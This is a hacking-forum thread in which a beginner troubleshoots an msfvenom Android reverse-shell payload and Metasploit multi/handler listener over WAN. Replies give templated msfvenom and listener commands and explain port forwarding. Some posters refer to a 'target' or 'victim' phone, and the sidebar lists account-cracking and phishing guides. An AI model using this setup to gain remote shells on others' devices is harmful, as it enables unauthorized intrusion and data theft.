Hi guys!
I am new to hacking. I used the msfvenom to create a payload and sent it to my phone. LHOST was my private IP address and port was 4444, I set up the listener, and it worked.
But, over WAN, when I use my public IP in the payload and private IP in the listener, it doesn't establish a connection with my phone. Why does it happen. Help would be really appreciated.
Forum Thread:
When My Kali Linux Finishes Installing (It Is Ready to Boot), and When I Try to Boot It All I Get Is a Black Screen.
8
Replies
Forum Thread:
HACK ANDROID with KALI USING PORT FORWARDING(portmap.io)
12
Replies
Forum Thread:
Hydra Syntax Issue Stops After 16 Attempts
2
Replies
Forum Thread:
Hack Instagram Account Using BruteForce
208
Replies
Forum Thread:
Metasploit reverse_tcp Handler Problem
47
Replies
Forum Thread:
How to Train to Be an IT Security Professional (Ethical Hacker)
22
Replies
Metasploit Error:
Handler Failed to Bind
41
Replies
Forum Thread:
How to Hack Android Phone Using Same Wifi
21
Replies
How to:
HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide]
177
Replies
How to:
Crack Instagram Passwords Using Instainsane
36
Replies
Forum Thread:
How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More
5
Replies
Forum Thread:
How Many Hackers Have Played Watch_Dogs Game Before?
13
Replies
Forum Thread:
How to Hack an Android Device with Only a Ip Adress
55
Replies
How to:
Sign the APK File with Embedded Payload (The Ultimate Guide)
10
Replies
Forum Thread:
How to Run and Install Kali Linux on a Chromebook
18
Replies
Forum Thread:
How to Find Admin Panel Page of a Website?
13
Replies
Forum Thread:
can i run kali lenux in windows 10 without reboting my computer
4
Replies
Forum Thread:
How to Hack School Website
11
Replies
Forum Thread:
Make a Phishing Page for Harvesting Credentials Yourself
8
Replies
Forum Thread:
Creating an Completely Undetectable Executable in Under 15 Minutes!
38
Replies
How To:
Find Vulnerable Webcams Across the Globe Using Shodan
How To:
Exploit EternalBlue on Windows Server with Metasploit
How To:
Use SQL Injection to Run OS Commands & Get a Shell
How To:
Brute-Force FTP Credentials & Get Server Access
How To:
Make Your Own Bad USB
How To:
Find Passwords in Exposed Log Files with Google Dorks
How To:
BeEF - the Browser Exploitation Framework Project OVER WAN
How To:
Scan for Vulnerabilities on Any Website Using Nikto
How To:
Hack Apache Tomcat via Malicious WAR File Upload
How To:
Perform Advanced Man-in-the-Middle Attacks with Xerosploit
How To:
Target Bluetooth Devices with Bettercap
How To:
Create Custom Wordlists for Password Cracking Using the Mentalist
How To:
Intercept Images from a Security Camera Using Wireshark
How To:
Use Command Injection to Pop a Reverse Shell on a Web Server
How To:
Use Ettercap to Intercept Passwords with ARP Spoofing
How To:
Attack a Vulnerable Practice Computer: A Guide from Scan to Shell
How To:
Hack Open Hotel, Airplane & Coffee Shop Wi-Fi with MAC Address Spoofing
How To:
How Hackers Use Your IP Address to Hack Your Computer & How to Stop It
How To:
Crack Wi-Fi Passwords—For Beginners!
How To:
Find & Exploit SUID Binaries with SUID3NUM
16 Responses
have u forwarded the ports?
You need to set Public IP in the listener, too. Because it will listen on that IP using port. So check port forwarding and set PUBLIC IP in the listener.
Could you please explain a little bit more about your dilema. What you just said is very vague, I mean what is the exact error that is occurring?
No, I understand it. It's not vague. He is trying to say it's not connecting when using WAN connection. As I said, use your public IP in listener and open port 4444 in your network.
If you set the listener to the public IP address on your attacking machine it will fail to bind and default to 0.0.0.0 because the address belongs to the router/gateway and does not belong to your attacking machine. It will still work though because 0.0.0.0 will bind all local IP's.
Sounds to me like you need to start by checking your port forward.
That's not true... It can fail binding but it doesn't have to. I actually did some successful attacks and it didn't fail... That's because port 44444 is forwarded only on my PC so it won't work for entire network.
It is true that the listener (multi/handler) cannot bind to the public IP address of the router/gateway and it will then default to 0.0.0.0.
This can be ignored if you have the port forward setup and you will still get your shell. This is because the router/gateway will forward the traffic for that port to your attacking machine and the attacking machine will be listening on all interfaces (0.0.0.0).
In Faizan Abrar's case he is simply executing his pre-made payload on his mobile device. So he would create it with something like this:
msfvenom -p <reverse_payload> LHOST=Public_IP LPORT=4444 -f <format> -o <output>
Then he would port forward incoming traffic on port 4444 from his router/gateway to his attacking machine's local IP address.
Then he would setup his listener:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD <reverse_payload>
PAYLOAD => <reverse_payload>
msf exploit(handler) > set LHOST local_IP
LHOST => local_IP
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run
* Started reverse handler on local_IP:4444
* Starting the payload handler...
If he were using a metasploit module he could either set the LHOST as his public IP address and let the listener default to 0.0.0.0 or disable the payload handler and set it up separately as above, only that is more steps for no reason in that case.
this is what i do exactly but the listener just works on a same network and does not work when my phone and attack machine are not in a same network. (my laptop is connected to my home network and phone is on Cell Data)
my commands:
msfvenom -p <reversepayload> ..LHOST= <External IP> LPORT=4444...
msfconsole:
set PAYLOAD: <reversepayload>
set LHOST=my local IP
set LPORT=4444
my local IP is 192.168.1.104 and have forwarded the 4444port to this IP.
Well if I had to guess it would be either your port forward is not setup properly or something is blocking the reverse connection. You could do a test by running a packet capture on your LAN (wireshark/tcpdump) then try to simply telnet or netcat to your public IP address from a remote network on the forwarded port. If everything is setup correctly you should be able to watch the traffic.
I don't know how..but my problem is solved!!!! but when my target runs APK file..connection fails after a short while. but when I try on my phone it works well. my phone is on LTE and my laptop is connected to my home network. ( separate networks).
bro help me how to port forward my external ip address. on android 7.1.2. can u please reply me.
ahhh... I didn't understand what exactly what was going on because I haven't experienced enough yet with metasploit. Thanks for the explanation.:)
Do what he said. You have payload so make listener like he said above. Use your local IP, BUT, you can use your public IP, too. It may fail to bind, but that's not a problem. But I was using public IP in my listeners and it didn't fail to bind.
Hello everyone i need help in android hacking on wan. I have too much confusion and two problems
hi guys
i have kali on Vb
i use bridge to access internet
i have different local ip for my windows and kali runing on Vb
is this make any changes?
i am getting the success messages , yet my meterpreter session is not opening !
i am running my kali linux on vitualbox (using bridge network) and connected to the internet via wifi , and my victim android phone on the same wifi .
i have tried for 4444 aswell as 8080 ports.
and using my ip address for the kali linux in virtualbox .
I am new to this , please help me.
Share Your Thoughts